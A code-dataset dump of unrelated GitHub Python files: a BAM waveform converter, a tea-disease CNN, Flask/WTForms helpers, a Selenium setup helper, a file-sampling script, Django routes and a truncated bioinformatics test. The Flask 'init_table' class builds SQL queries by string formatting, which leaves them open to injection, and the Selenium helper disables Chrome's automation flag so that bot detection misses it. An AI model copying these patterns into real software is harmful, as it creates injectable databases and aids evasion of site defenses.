#还希望得到同意的指示\n print(\"抱歉没有找到%s\"%find_name)\nprint(students)\nstudents[0][\"name\"]=\"D\"\nprint(students)\n","repo_name":"lyyzwjj/pythonlearn","sub_path":"base/base1/_12_for_else.py","file_name":"_12_for_else.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28087894633","text":"#!/usr/bin/env python\n\n## Convert BAM Rh files into SXS format\nimport argparse\nimport os\nimport glob\n\nimport h5py\nimport numpy as np\n\n\nparser = argparse.ArgumentParser('bam')\nparser.add_argument(\"--run-directory\", type=str, help=\"BAM run directory\")\nparser.add_argument(\"--output-directory\", type=str, help=\"Output directory\", default=\".\")\nparser.add_argument(\"--extraction-radius\", type=float, help=\"Extraction radius\", default=1100.0)\nparser.add_argument(\"--level\", type=str, help=\"AMR level\", default=1)\nargs = parser.parse_args()\n\nname = os.path.basename(args.run_directory)\n\nf = h5py.File(f\"{args.output_directory}/rh_{name}.h5\", \"w\")\nf.create_group(\"Extrapolated_N2.dir\")\n\npattern = f\"{args.run_directory}/postprocessed/Rh_*_r{args.extraction_radius}_l{args.level}.txt\"\nfor filename in sorted(glob.glob(pattern)):\n basename = os.path.basename(filename)\n sp = basename.split(\"_\")\n # print(sp)\n l = int(sp[1].removeprefix(\"l\"))\n m_sign = 1\n m_str = sp[2].removeprefix(\"m\")\n if m_str.startswith(\"m\"):\n m_sign = -1\n m_str = m_str.removeprefix(\"m\")\n m = m_sign * int(m_str)\n\n rh_data = np.loadtxt(filename)\n ds = f.create_dataset(f\"Extrapolated_N2.dir/Y_l{l}_m{m}.dat\", (len(rh_data),3), dtype='<f8')\n ds[:,:] = rh_data[:,:3]\n\nf.close()\n","repo_name":"unkaktus/rose","sub_path":"utils/bam.py","file_name":"bam.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"70377299361","text":"import numpy as np\r\nimport tensorflow as tf\r\nfrom tensorflow.keras import layers\r\nfrom tensorflow.keras.models import Sequential\r\nfrom sklearn.metrics import classification_report\r\n\r\n#dataset path\r\ndata_dir = \"C:/Users/Master/Downloads/archive (3)/tea sickness dataset\"\r\n\r\n#setting image size and batch size\r\nimg_height,img_width=180,180\r\nbatch_size=32\r\n\r\n#training \r\ntrain_data = tf.keras.preprocessing.image_dataset_from_directory(\r\n data_dir,\r\n validation_split=0.2,\r\n subset=\"training\",\r\n seed=123,\r\n image_size=(img_height, img_width),\r\n batch_size=batch_size)\r\n\r\n#validation\r\ntest_data = tf.keras.preprocessing.image_dataset_from_directory(\r\n data_dir,\r\n validation_split=0.2,\r\n subset=\"validation\",\r\n seed=123,\r\n image_size=(img_height, img_width),\r\n batch_size=batch_size)\r\n\r\nclass_names = train_data.class_names\r\nprint(class_names)\r\n\r\nclasses = 8\r\n\r\n#CNN Model\r\nmodel = Sequential([\r\n layers.experimental.preprocessing.Rescaling(1./255, input_shape=(img_height, img_width, 3)),\r\n layers.Conv2D(16, 3, padding='same', activation='relu'),\r\n layers.MaxPooling2D(),\r\n layers.Conv2D(32, 3, padding='same', activation='relu'),\r\n layers.MaxPooling2D(),\r\n layers.Conv2D(64, 3, padding='same', activation='relu'),\r\n layers.MaxPooling2D(),\r\n layers.Flatten(),\r\n layers.Dense(128, activation='relu'),\r\n layers.Dense(classes,activation='softmax')\r\n])\r\n\r\n\r\n#compile and fiting of the model\r\nmodel.compile(optimizer='adam',\r\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\r\n metrics=['accuracy'])\r\nmodel.fit(train_data,validation_data=test_data,epochs=15)\r\n\r\n#Prediction using unseen data\r\nimage_batch, label_batch = test_data.as_numpy_iterator().next()\r\npredictions = model.predict_on_batch(image_batch)\r\nclass_predictions = []\r\nfor i in predictions:\r\n class_prediction = np.argmax(i)\r\n class_predictions.append(class_prediction)\r\n\r\nclass_predictions = np.array(class_predictions)\r\nprint('Predictions:\\n', class_predictions)\r\nprint('Labels:\\n', label_batch)\r\nprint(classification_report(label_batch, class_predictions))\r\n\r\n#classification report gives a accuracy,f1-score,precision and recall","repo_name":"crystelmjojy/TAS-INNOVATION","sub_path":"Task 2.py","file_name":"Task 2.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42141482210","text":"# 随机生成n位数的和 平均数 方差 与中位数\nfrom random import *\nfrom time import *\nfrom math import *\n\n# 生成一个随机列表\nt = perf_counter()\nlist1 = []\nfor i in range(10):\n num1 = randint(0, 100)\n list1.append(num1)\nlist1.sort()\nprint(\"随机生成的数为:\", list1)\n# 求和\nnum2 = 0 # 和\nfor i in list1:\n num2 += i\nprint(\"和为:\", num2)\n# 平均数\nlen1 = int(len(list1))\nnum3 = num2 / len1\nprint(\"平均数为:\", num3)\n# 方差\nnum4 = 0 # 方差\nfor i in list1:\n num4 += (i - num3) ** 2\nnum41 = num4 / len1\nprint(\"方差为:\", num41) # 方差\n# 中位数\nnum5 = 0 # 中位数\nlen2 = float(len1 / 2)\nlen21 = 0\nlen22 = 0\nif len1 % 2 == 0:\n len2 = int(len1 / 2)\n len21 = int(len2 + 1)\n num5 = (int(list1[len2]) + int(list1[len21])) / 2\n print(\"中位数为:\", num5)\nelse:\n len22 = int(ceil(len2))-1\n print(\"中位数为:\", list1[len22])\nprint(\"程序运行结束,运行时间为:{}s\".format(perf_counter()))\n","repo_name":"linzhongxiazhi/student_python","sub_path":"学习/数学问题/和 平均数 方差 中位数.py","file_name":"和 平均数 方差 中位数.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25944252404","text":"from wtforms import Form, StringField, TextAreaField, PasswordField, validators\nfrom blue import database as db\n###SQLAlchemy\n\n\n\n## Register Form Class\nclass RegisterForm(Form):\n name = StringField('Name', [validators.Length(min=1, max=50)])\n username = StringField('Username', [validators.Length(min=4, max=25)])\n email = StringField('Email', [validators.Length(min=6, max=50)])\n password = PasswordField('Password', [\n validators.DataRequired(),\n validators.EqualTo('confirm', message='Passwords do not match')\n ])\n confirm = PasswordField('Confirm Password')\n# Article Form Class\nclass ArticleForm(Form):\n title = StringField('Title', [validators.Length(min=1, max=200)])\n body = TextAreaField('Body', [validators.Length(min=0)])\n#Template Form class\nclass TemplateForm(Form):\n name = StringField('Name')\n body = TextAreaField('Body')\n param = TextAreaField('Parameters')\n link = StringField('Link')\n'''\nclass Uploaded_files():\n @staticmethod\n def upd(name,path):\n try:\n file = db.File()\n #self.id, self.title,self.body,self.author = cursor\n file.name=name\n file.path=path\n db.db.session.add(file)\n db.db.session.commit()\n return file #'Done'#cls(cursor,list=True)\n except:\n print('test_error')\n return 'Error'\n'''\n\nclass init_table():\n \"\"\"docstring for init_table.\"\"\"\n def __init__(self, arg=None,list=False):\n if list:\n self.list= arg\n print('List=True')\n else:\n print('List=False')\n if arg is not None: self.arg = arg\n @classmethod\n def fetchone(cls,id,where='id'):\n try:\n print(cls.table)\n print(cls.select)\n cursor=db.query_db(\"SELECT {} FROM {} WHERE {} = '{}'\".format(cls.select,cls.table,where,id),one=True)\n print(\"SELECT {} FROM {} WHERE {} = '{}'\".format(cls.select,cls.table,where,id))\n return cls(cursor)\n except:\n print('error')\n return\n @classmethod\n def fetchall(cls,id=1,where=1):\n try:\n print(cls.table)\n print(cls.select)\n print(\"SELECT {} FROM {} WHERE {} = {}\".format(cls.select,cls.table,where,id))\n cursor=db.query_db(\"SELECT {} FROM {} WHERE {} = {}\".format(cls.select,cls.table,where,id))\n print('teset')\n return cls(cursor,list=True)\n except:\n print('error')\n return\n @classmethod\n def set_table_select(cls,table,select='*'):\n cls.table=table\n cls.select=select\n #UPDATE\n #@staticmethod\n\n def add(self,into,value):\n try:\n print(\"INSERT INTO {}({}) VALUES({})\".format(self.table, into,value))\n #db.query_db(\"UPDATE {} SET {} WHERE {} = '{}'\".format(self.table, set,where,id)) #name=?, body=?, param=?, link=?\n db.query_db(\"INSERT INTO {}({}) VALUES({})\".format(self.table, into,value))\n print('add')\n db.get_db().commit()\n print('add')\n return #cls(cursor,list=True)\n except:\n print('add_error')\n return\n\n def update(self,set,id,where='id'):\n try:\n print('{},{},{},{}'.format(self.table, set,where,id))\n print(\"UPDATE {} SET {} WHERE {} = '{}'\".format(self.table, set,where,id))\n db.query_db(\"UPDATE {} SET {} WHERE {} = '{}'\".format(self.table, set,where,id)) #name=?, body=?, param=?, link=?\n print('update')\n db.get_db().commit()\n print('update')\n return #cls(cursor,list=True)\n except:\n print('update_error')\n return\n\n def delete(self,id,where='id'):\n try:\n #print('{},{},{},{}'.format(self.table, set,where,id))\n print(\"DELETE FROM {} WHERE {} = '{}'\".format(self.table,where,id))\n #db.query_db(\"UPDATE {} SET {} WHERE {} = '{}'\".format(self.table, set,where,id)) #name=?, body=?, param=?, link=?\n db.query_db(\"DELETE FROM {} WHERE {} = '{}'\".format(self.table,where,id))\n print('delete')\n db.get_db().commit()\n print('delete')\n return #cls(cursor,list=True)\n except:\n print('delete_error')\n return\n\n def test(self,view):\n try:\n #for i in [1, 2, 3]:\n # view = File()\n # view.name = \"Example1 \" + str(i)\n # print(view.name)\n # view.path = \"example_\" + str(i) + \".pdf\"\n # db.db.session.add(view)\n #view.id=1\n #view.name='test'\n #view.path='path_test'\n\n #admin = User.query.filter_by(username='admin').first()\n #admin.email = 'my_new_email@example.com'\n #rows_changed = User.query.filter_by(role='admin').update(dict(permission='add_user'))\n #Notice that filter_by takes keyword arguments (use only one =) as opposed to filter which takes an expression.\n\n #user = view.query.get(1)\n #user.name = 'New Name123'\n #user = view.query.filter_by(id=3).first()\n #db.db.session.delete(user)\n #db.db.session.commit()\n\n user = db.Articles_new()\n #self.id, self.title,self.body,self.author = cursor\n user.title='test'\n user.body ='test'\n user.author ='test'\n db.db.session.add(user)\n db.db.session.commit()\n return 'Done'#cls(cursor,list=True)\n except:\n print('test_error')\n return 'Error'\n\nclass Articles_old(init_table):\n table='articles_v'\n select='id,title,body,author'\n def __init__(self,cursor=None,list=False):\n #super().__init__(cursor,list=False)\n if list:\n self.list= cursor\n print('List=True')\n else:\n print('List=False')\n if cursor is not None: self.id, self.title,self.body,self.author = cursor\n\nclass Templates(init_table):\n table='template'\n select='id,name,body,param,link'\n def __init__(self,cursor=None,list=False):\n #super().__init__(cursor,list=False)\n if list:\n self.list= cursor\n print('List=True')\n else:\n print('List=False')\n if cursor is not None: self.id, self.name,self.body,self.param,self.link = cursor\n","repo_name":"vikvo11/destacar","sub_path":"flask-blueprint/blue/site/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":6461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12456541418","text":"import os\nfrom selenium import webdriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\n\ndef read_env_file(envFileName = '.env'):\n \"\"\"Attempt to read the .env file.\"\"\"\n try:\n envFile = open(envFileName)\n except:\n # .env file was not found\n return None\n\n envVarList = envFile.read().splitlines()\n for envVar in envVarList:\n envVarKeyVal = envVar.split('=')\n\n if len(envVarKeyVal) == 2:\n os.environ[envVarKeyVal[0]] = envVarKeyVal[1]\n \n return os.environ\n\ndef setup_chrome_driver(enablePerfLogging = False, perfLogPrefs = None):\n \"\"\"Setup undetected ChromeDriver.\"\"\"\n # Make ChromeDriver undetected\n # Also some things you might want to consider...\n # https://stackoverflow.com/questions/33225947/can-a-website-detect-when-you-are-using-selenium-with-chromedriver/41220267\n # https://stackoverflow.com/questions/53039551/selenium-webdriver-modifying-navigator-webdriver-flag-to-prevent-selenium-detec\n options = webdriver.ChromeOptions()\n options.add_argument('--disable-blink-features=AutomationControlled')\n\n if (enablePerfLogging):\n # Enable performance log\n # https://chromedriver.chromium.org/logging/performance-log\n caps = DesiredCapabilities.CHROME\n caps['goog:loggingPrefs'] = {'performance': 'ALL'}\n\n if perfLogPrefs:\n options.add_experimental_option('perfLoggingPrefs', perfLogPrefs)\n\n return webdriver.Chrome(desired_capabilities=caps, options=options)\n else:\n return webdriver.Chrome(options=options)\n\ndef setup_url_list(argv):\n \"\"\"Setup the URL list.\"\"\"\n urlList = None\n mode = 'default'\n\n if len(argv) > 2:\n if argv[1] == '-l':\n # Populate url list from text file\n listFile = open(argv[2])\n urlList = listFile.read().splitlines()\n mode = 'file'\n\n if mode != 'file':\n # Populate url list from CLI args\n urlList = argv[1:]\n \n return urlList\n","repo_name":"mattlean/auto-downloader-core","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74757509602","text":"import os\nimport sys\nimport random\nimport shutil\nimport numpy as np\n\n\"\"\"\nroot ディレクトリに存在するファイルをランダムに選び target ディレクトリに移すスクリプト\nオプションによってディレクトリ上のファイル数を閲覧,moveの代わりにcopyを用いることができる.\nまた,ランダムに選ぶファイル数はデフォルトで 1000 である.\nこれはnumオプションに数字を打ち込むことで変更させることができる.\n\n「使い方」\n$ python pick_some.py root_dir target_dir [-l, -c] [num]\n\n「オプション」\n-l: ファイル数の閲覧\n-c: move ではなく copy を使用\nnum: ランダムに選ぶファイル数を変更\n\"\"\"\n\n\ndef _(root, target ,num, is_move=True):\n files = os.listdir(root)\n cnt = int(num)\n l = len(files)\n if cnt == 0:\n return -1\n\n random.seed(0)\n random.shuffle(files)\n\n if is_move: operation = shutil.move\n else: operation = shutil.copy\n\n for i in range(cnt):\n file = files[i]\n operation(root + file, target)\n if (i % (cnt//10) == 0):\n progress = int((i / cnt) * 100)\n print(\" [Processing] ... {0} %\".format(progress))\n return 1\n\ndef pick_some(root:str, target:str, is_look=False, is_move=True, num_of_pick=1000):\n num = num_of_pick\n # -l オプションがついていたならファイルの数を表示する\n if is_look:\n root = argv[1]\n target = argv[2]\n files = len(os.listdir(root))\n copys = len(os.listdir(target))\n print(\"\\n There exists {0} files @ {1}\".format(files, root))\n print(\" There exists {0} files @ {1}\\n\".format(copys, target))\n return 1\n\n # ファイルの copy または move を実行する\n print(\"\\n From {0}, trying to get {1} files...\".format(root, num))\n files_len1 = len(os.listdir(target))\n _(root, target, num, is_move)\n files_len2 = len(os.listdir(target))\n newfiles = files_len2 - files_len1\n print(\" [Done] Added {0} files @ {1}\\n\".format(newfiles, target))\n\n\nif __name__=='__main__':\n argv = sys.argv\n # 入力の長さは3以上5以下\n if len(argv) < 3 or len(argv) > 5:\n raise Exception(\"\\n invalid input length ...\")\n # 入力が root, target のみならば copy する\n elif len(argv) == 3:\n pick_some(argv[1], argv[2])\n # 入力に -l オプションがあるならば is_look を True に\n elif \"-l\" in argv:\n argv.remove(\"-l\")\n if len(argv) == 3:\n pick_some(argv[1], argv[2], is_look=True)\n else:\n raise Exception(\"\\n invalid syntacs ...\")\n else:\n num_of_pick = \"1000\"\n is_move = True\n # 数字が入力に入っていたらそれが num_of_pick 引数になる\n for arg in argv:\n if str.isdigit(arg):\n num_of_pick = arg\n argv.remove(arg)\n # -c オプションならば move を copy に変更\n if \"-c\" in argv:\n argv.remove(\"-c\")\n is_move = False\n # ここまでの処理で入力文字列の長さを3に削減できたら実行\n if len(argv) == 3:\n pick_some(argv[1], argv[2], is_move=is_move, num_of_pick=num_of_pick)\n\n","repo_name":"TKNRK/works","sub_path":"2017/0808/pick_some.py","file_name":"pick_some.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12251482588","text":"def solution(A):\n # write your code in Python 3.6\n nums = {}\n for i in A:\n if i in nums.keys():\n nums[i] = nums[i] + 1\n else:\n nums[i] = 1\n \n for key, value in nums.items():\n if value % 2 == 1:\n return key\n ","repo_name":"apulijala/python-crash-course","sub_path":"codility/lesson1/odd_integers.py","file_name":"odd_integers.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5680579365","text":"from django.contrib import admin\nfrom django.urls import path,include\nfrom investor import views\nurlpatterns = [\n path('home/', views.home, name=\"investor-home\"),\n path('home/get_tabledata/', views.get_data_table, name=\"investor-home\"),\n path('home/get_graph1data/', views.get_data_graph1, name=\"investor-home\"),\n path('home/post_invest_data/', views.investData, name=\"invest\"),\n path('company_rev_details/<cname>', views.get_data_graph2, name=\"see_details\"),\n path('company_rev_details-ajax/<cid>', views.get_data_graph2_ajax, name=\"see_details_ajax\"),\n path('payment/', views.payment, name=\"payment-gateway\"),\n path('profit-table/', views.profit_table, name=\"profit-table\"),\n]","repo_name":"Rifat-BH/VentureVest","sub_path":"investor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"7515554798","text":"__doc__ = \"NOTE: multiprocessing must be patched as indicated by \\\nhttps://hg.python.org/cpython/rev/c82588ca3a79#l1.1\"\n\n\n########################################################\n#~ Import libraries.\n########################################################\nfrom cellery import __object__\nfrom cellery import alignments\nfrom cellery import __classes__\nfrom numpy import array,float32\nfrom string import upper\n\nimport os\nimport unittest\n\n#--------------------------------------------------------\n#~ make dummy object\ndef mkLObjct_Isfrm():\n\t\"\"\"\n\tMake dummy object\n\t\"\"\"\n\tname = 'ENST00000536489'\n\tstrnd = '-1'\n\tcmmNm = 'RPH3AL'\n\tpos = 0\n\tchr = '17'\n\taIntrvls = array([(63435,63714),(65444,65593),(69413,69527),(96901, \\\n\t97076),(169210,169340),(171062,171206),(177257,177370),(202502, \\\n\t202633)])\n\tlenIntrvl = __object__.clcLen(aIntrvls)\n\tsrtdMirnaNms = ['let-7a-5p','miR-181b-5p','miR-19b-2-5p']#sorted miRNAs\n\taMirnaCnts = array([1,2,0],dtype=float32)#counts for TargetScan\n\taMirnaRNAhCnts = array([1,2,1],dtype=float32)#counts for RNA hybrid\n\taMirnaRNAhEngy = array([-21.3,-20.3,-20.0],dtype=float32) #energy for RNA hybrid\n\taMirnaMirndCnts = array([3,2,0],dtype=float32)#counts for miRanda counts\n\taMirnaMirndScrs = array([140.0,146.1,142.0],dtype=float32)#scores for miRanda \n\taMirnaMirndEngy = array([-21.3,-18.64,-15.64],dtype=float32)#energy for miRanda \n\taMirnaSVMicroCnts = array([1,2,3],dtype=float32)#counts for SVMicro\n\taMirnaSVMicroScrs = array([240.0,136.1,122.5],dtype=float32)#scores for miRanda \n\taMirnaTrgtMnrCnts = array([1,0,3],dtype=float32)#counts for TargetMiner\n\taMirnaPITACnts = array([1,1,3],dtype=float32)#counts for miRanda \n\taMirnaPITAScrs = array([40.0,246.1,42.0],dtype=float32)#scores for miRanda \n\taMirnaMirMapScrs = array([32.0,44.1,21.0],dtype=float32)#scores for mirMap\n\taMirnaMirMapCnts = array([2,2,3],dtype=float32)#counts for mirMap\n\taMirnaWalk = array([0,1,0],dtype=bool)#mirWalk confirmation\n\t#make gen object\n\tgene = __classes__.gene(name,srtdMirnaNms)\n\tgene.strnd = strnd\n\tgene.cmmNm = cmmNm\n\tgene.pos = pos\n\tgene.chr = chr\n\tgene.aIntrvls = aIntrvls\n\tgene.len = lenIntrvl\n\tgene.aMirnaCnts = aMirnaCnts\n\tgene.aMirnaRNAhCnts = aMirnaRNAhCnts\n\tgene.aMirnaRNAhEngy = aMirnaRNAhEngy\n\tgene.aMirnaMirndCnts = aMirnaMirndCnts\n\tgene.aMirnaMirndScrs = aMirnaMirndScrs\n\tgene.aMirnaMirndEngy = aMirnaMirndEngy\n\tgene.aMirnaSVMicroCnts = aMirnaSVMicroCnts\n\tgene.aMirnaSVMicroScrs = aMirnaSVMicroScrs\n\tgene.aMirnaTrgtMnrCnts = aMirnaTrgtMnrCnts\n\tgene.aMirnaPITACnts = aMirnaPITACnts\n\tgene.aMirnaPITAScrs = aMirnaPITAScrs\n\tgene.aMirnaMirMapScrs = aMirnaMirMapScrs\n\tgene.aMirnaMirMapCnts = aMirnaMirMapCnts\n\tgene.aMirnaWalk = aMirnaWalk\n\treturn [gene]\n\n\n########################################################\n#~ Retrieve sequence alignments in fasta/mirMap format.\n########################################################\ndef runTest_fastaMirMap():\n\t#--------------------------------------------------------\n\t#~ Define variables\n\tdbFldr = os.path.join('tests2','db')# db folder\n\tpthToMAF = os.path.join(dbFldr,'maf')# multiz100-way MAF files\n\textnsnMAF = '.maf' # extension for the MAF files\n\textnsnUTRMirMap = '.fas'# extension for the input alignments for mirmap\n\tsppRef = 'hg19' #spp code for UCSC alignments (i.e. a name==hg19)\n\tpthToUCSCKEGG = os.path.join(dbFldr,'dbUCSCtKEGG.tsv')\n\tlObjcts_Isfrm = mkLObjct_Isfrm()\n\t#--------------------------------------------------------\n\t#~ Define output folders\n\talignmntsFldr = os.path.join(dbFldr,'alignments')\n\tif not os.path.exists(alignmntsFldr):\n\t\tos.mkdir(alignmntsFldr)\n\t#--------------------------------------------------------\n\t#~ Return alignments for protein coding isoforms\n\talignments.proccsMAFnUTRsMirMap(lObjcts_Isfrm,pthToMAF,extnsnMAF, \\\n\textnsnUTRMirMap,alignmntsFldr,sppRef,pthToUCSCKEGG)\n\t#--------------------------------------------------------\n\t#~ Test result\n\tinFst = os.path.join(alignmntsFldr,'%s%s'%(lObjcts_Isfrm[0].name, \\\n\textnsnUTRMirMap))\n\tseqTest = dict([(seq.split()) for seq in open(inFst).read(). \\\n\tsplit('>') if seq.strip()])[sppRef]\n\tseqTest = seqTest.replace('-','')\n\treturn seqTest\n\t\n\n########################################################\n#~ Retrieve sequence alignments in fasta/RNAhybrid/PITA/miRanda format \n# (fasta only reference).\n########################################################\ndef runTest_fastaRNAhybridPITAmiRanda():\n\t#--------------------------------------------------------\n\t#~ Define variables\n\tdbFldr = os.path.join('tests2','db')# db folder\n\tpthToMAF = os.path.join(dbFldr,'maf')# multiz100-way MAF files\n\textnsnMAF = '.maf' # extension for the MAF files\n\textnsnUTRMirMap = '.fasta'# extension for the input alignments for mirmap\n\tsppRef = 'hg19' #spp code for UCSC alignments (i.e. a name==hg19)\n\tpthToUCSCKEGG = os.path.join(dbFldr,'dbUCSCtKEGG.tsv')\n\tlObjcts_Isfrm = mkLObjct_Isfrm()\n\t#--------------------------------------------------------\n\t#~ Define output folders\n\talignmntsFldr = os.path.join(dbFldr,'alignments')\n\tif not os.path.exists(alignmntsFldr):\n\t\tos.mkdir(alignmntsFldr)\n\t#--------------------------------------------------------\n\t#~ Return alignments for protein coding isoforms\n\talignments.proccsMAFnUTRsOnlySppRef(lObjcts_Isfrm,pthToMAF, \\\n\textnsnMAF,extnsnUTRMirMap,alignmntsFldr,sppRef,pthToUCSCKEGG)\n\t#--------------------------------------------------------\n\t#~ Test result\n\tinFst = os.path.join(alignmntsFldr,'%s%s'%(lObjcts_Isfrm[0].name, \\\n\textnsnUTRMirMap))\n\tseqTest = dict([(seq.split()) for seq in open(inFst).read(). \\\n\tsplit('>') if seq.strip()])['ENST00000536489']\n\tseqTest = seqTest.replace('-','')\n\treturn seqTest\n\n\n########################################################\n#~ Retrieve sequence alignments in TargetMiner format.\n########################################################\ndef runTest_targetMiner():\n\t#--------------------------------------------------------\n\t#~ Define variables\n\tdbFldr = os.path.join('tests2','db')# db folder\n\tpthToMAF = os.path.join(dbFldr,'maf')# multiz100-way MAF files\n\textnsnMAF = '.maf' # extension for the MAF files\n\textnsnUTRTrgtMnr = '.tmr'# extension of UTR file for TargetMiner\n\tsppRef = 'hg19' #spp code for UCSC alignments (i.e. a name==hg19)\n\tpthToUCSCKEGG = os.path.join(dbFldr,'dbUCSCtKEGG.tsv')\n\tlObjcts_Isfrm = mkLObjct_Isfrm()\n\t#--------------------------------------------------------\n\t#~ Define output folders\n\talignmntsFldr = os.path.join(dbFldr,'alignments')\n\tif not os.path.exists(alignmntsFldr):\n\t\tos.mkdir(alignmntsFldr)\n\t#--------------------------------------------------------\n\t#~ Return alignments for protein coding isoforms\n\talignments.procssUTRTrgtMnr(lObjcts_Isfrm,pthToMAF,extnsnMAF, \\\n\textnsnUTRTrgtMnr,alignmntsFldr,sppRef,pthToUCSCKEGG)\n\t#--------------------------------------------------------\n\t#~ Test result\n\tinFst = os.path.join(alignmntsFldr,'%s%s'%(lObjcts_Isfrm[0].name, \\\n\textnsnUTRTrgtMnr))\n\tseqTest = dict([(seq.split()[0],seq.splitlines()[1]) for seq in \\\n\topen(inFst).read().split('>') if seq.strip()])['ENST00000536489']\n\tseqTest = upper(seqTest.replace('-',''))\n\treturn seqTest\n\n\n########################################################\n#~ Retrieve sequence alignments in TargetScan format.\n########################################################\ndef runTest_targetScan():\n\t#--------------------------------------------------------\n\t#~ Define variables\n\tdbFldr = os.path.join('tests2','db')# db folder\n\tpthToMAF = os.path.join(dbFldr,'maf')# multiz100-way MAF files\n\textnsnMAF = '.maf' # extension for the MAF files\n\textnsnUTRTrgtScn = '.utr'# extension of UTR file for TargetScan\n\tsppRef = 'hg19' #spp code for UCSC alignments (i.e. a name==hg19)\n\tpthToUCSCKEGG = os.path.join(dbFldr,'dbUCSCtKEGG.tsv')\n\tlObjcts_Isfrm = mkLObjct_Isfrm()\n\t#--------------------------------------------------------\n\t#~ Define output folders\n\talignmntsFldr = os.path.join(dbFldr,'alignments')\n\tif not os.path.exists(alignmntsFldr):\n\t\tos.mkdir(alignmntsFldr)\n\t#--------------------------------------------------------\n\t#~ Return alignments for protein coding isoforms\n\talignments.proccsMAFnUTRsTrgtScn(lObjcts_Isfrm,pthToMAF,extnsnMAF, \\\n\textnsnUTRTrgtScn,alignmntsFldr,sppRef,pthToUCSCKEGG)\n\t#--------------------------------------------------------\n\t#~ Test result\n\tinFst = os.path.join(alignmntsFldr,'%s%s'%(lObjcts_Isfrm[0].name, \\\n\textnsnUTRTrgtScn))\n\tseqTest = dict([(seq.split()[1],seq.split()[2]) for seq in \\\n\topen(inFst).read().split('>') if seq.strip()])['9606']\n\tseqTest = seqTest.replace('-','')\n\tseqTest = seqTest.replace('U','T')\n\treturn seqTest\n\n\n########################################################\n#~ Retrieve sequence alignments in SVMicro format.\n########################################################\ndef runTest_SVMicro():\n\t#--------------------------------------------------------\n\t#~ Define variables\n\tdbFldr = os.path.join('tests2','db')# db folder\n\tpthToPhstCns = os.path.join(dbFldr,'phastCons46way.d')\n\textnsnPhstCns = '.phastCons46way.wigFix.gz'\n\tpthToMAF = os.path.join(dbFldr,'maf')# multiz100-way MAF files\n\textnsnMAF = '.maf' # extension for the MAF files\n\textnsnSVMicro = '.svm'# extension of UTR file for SVMicro\n\tsppRef = 'hg19' #spp code for UCSC alignments (i.e. a name==hg19)\n\tpthToUCSCKEGG = os.path.join(dbFldr,'dbUCSCtKEGG.tsv')\n\tlObjcts_Isfrm = mkLObjct_Isfrm()\n\t#--------------------------------------------------------\n\t#~ Define output folders\n\talignmntsFldr = os.path.join(dbFldr,'alignments')\n\tif not os.path.exists(alignmntsFldr):\n\t\tos.mkdir(alignmntsFldr)\n\t#--------------------------------------------------------\n\t#~ Return alignments for protein coding isoforms\n\talignments.procssUTRSVMicro(lObjcts_Isfrm,pthToPhstCns, \\\n\textnsnPhstCns,alignmntsFldr,extnsnSVMicro,pthToMAF,extnsnMAF, \\\n\tsppRef,pthToUCSCKEGG)\n\t#--------------------------------------------------------\n\t#~ Test result\n\tinFst = os.path.join(alignmntsFldr,'%s%s'%(lObjcts_Isfrm[0].name, \\\n\textnsnSVMicro))\n\tseqTest = dict([(seq.splitlines()[1].split()[1], \\\n\tseq.splitlines()[1].split()[3]) for seq in open(inFst).read(). \\\n\tsplit('>') if seq.strip()])['ENST00000536489']\n\treturn seqTest\n\n\n#--------------------------------------------------------\n#~ run test\nclass TestAlignmentMethods(unittest.TestCase):\n\tglobal trueSeq\n\ttrueSeq = ''.join(['ATTGACTTAAGTCCCAGTGATTCAGCTCCTCATCTGGAA', \\\n\t'CACCTCGGGTCACCCCCGACAACGGTGGTGGGAGGGAGAGCGGCCTCCTCCTCCCTGGTGGGG', \\\n\t'CCTGTCTGGGTGAAGCCCCTCTGTTCCCGATGTGACTCCCCACCCCCAGCCGGGTGCTCCGAG', \\\n\t'CCATGGCCGACACCATCTTCGGCAGCGGGAATGATCAGTGGGTTTGCCCCAATGACCGGCAGC', \\\n\t'TTGCCCTTCGAGCCAAGCTGCAGACGGGCTGGTCCGTGCACACCTACCAGACGGAGAAGCAGA', \\\n\t'GGAGGAAGCAGCACCTCAGCCCGGCGGAGGTGGAGGCCATCCTGCAGGTCATCCAGAGGGCAG', \\\n\t'AGCGGCTCGACGTCCTGGAGCAGCAGAGAATCGGGCGGCTGGTGGAGCGGCTGGAGACCATGA', \\\n\t'GGCGGAATGTGATGGGGAACGGCCTGTCCCAGTGTCTGCTCTGCGGGGAGGTGCTGGGCTTCC', \\\n\t'TGGGCAGCTCGTCGGTGTTCTGCAAAGACTGCAGGAAGGTCTGGAAGAGGTCGGGGGCCTGGT', \\\n\t'TCTACAAAGGGCTCCCCAAGTATATCTTGCCCCTGAAGACCCCTGGCCGAGCTGATGACCCCC', \\\n\t'ACTTCCGACCTTTGCCCACGGAACCGGCAGAGCGAGAGCCCAGAAGCTCTGAGACCAGCCGCA', \\\n\t'TCTACACGTGGGCCCGAGGAAGAGTGGTTTCCAGTGACAGTGACAGTGACTCGGATCTTAGCT', \\\n\t'CCTCCAGCCTAGAGGACAGACTCCCATCCACTGGGGTCAGGGACCGGAAAGGCGACAAACCCT', 